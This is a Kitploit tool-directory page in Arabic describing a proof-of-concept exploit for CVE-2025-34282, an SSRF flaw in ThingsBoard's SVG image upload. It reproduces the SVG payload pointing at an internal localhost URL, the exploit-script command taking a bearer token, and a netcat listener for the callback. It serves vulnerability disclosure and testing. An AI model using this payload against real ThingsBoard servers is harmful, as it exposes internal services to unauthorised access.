Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
thingsboard-ssrf-cve-2025-34282 — استغلال إثبات المفهوم لـ CVE-2025-34282 - تزوير طلبات الخادم (SSRF) في ThingsBoard عبر رفع صور SVG | Kitploit
أدوات/GitHubGitHub/mathitam/thingsboard-ssrf-cve-2025-34282
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمر
GitHubmathitam/thingsboard-ssrf-cve-2025-34282

thingsboard-ssrf-cve-2025-34282

استغلال إثبات المفهوم لـ CVE-2025-34282 - تزوير طلبات الخادم (SSRF) في ThingsBoard عبر رفع صور SVG

عرض المستودع
3منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-34282 — ثغرة SSRF في ThingsBoard عبر تحميل صورة SVG

نظرة عامة

ثغرة تزييف الطلب من جانب الخادم (SSRF) في منصة ThingsBoard للإصدارات قبل 4.2.1.

يمكن للمهاجم الذي لديه صلاحيات مسؤول المستأجر تحميل ملف SVG مُعدّ خصيصاً يحتوي على مرجع داخلي URL من خلال معرض تحميل الصور. عندما يقوم ThingsBoard بمعالجة SVG من جانب الخادم، فإنه يجلب الـ URL المشار إليه — مما يسمح بالوصول إلى الخدمات الداخلية غير المكشوفة للإنترنت.

الحقلالتفاصيل
CVECVE-2025-34282
الإصدار المتأثر< 4.2.1
الإصدار المُصلح4.2.1
درجة CVSS6.9 متوسط
CWECWE-918 (تزييف الطلب من جانب الخادم)
الموردhttps://thingsboard.io

سلسلة الهجوم

  1. يقوم مسؤول المستأجر بتحميل SVG ضار إلى POST /api/image
    • يقوم الخادم بمعالجة SVG ويصدر طلبًا صادرًا إلى الـ URL المُضمن
  2. يتم إنشاء عنصر واجهة مخصص يحتوي على publicLink لـ SVG عبر وسم <object>
    • يتسبب عرض العنصر أيضًا في جلب الخادم

حمولة SVG

حمولة ssrf_localhost_5555.svg تحتوي على مرجع داخلي URL:

root@kitploit:~
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />

عند التحميل، يقوم خادم ThingsBoard بجلب http://127.0.0.1:5555، مما يؤكد وجود SSRF.

الاستخدام

المتطلبات:

root@kitploit:~
pip install requests

التشغيل:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>

مثال:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...

ابدأ مستمعًا لالتقاط رد الاتصال الخاص بـ SSRF قبل تشغيل الاستغلال:

root@kitploit:~
nc -l 5555

المراجع

  • https://www.cve.org/CVERecord?id=CVE-2025-34282

المؤلف

Tamil Mathi T.

تنزيل الأداة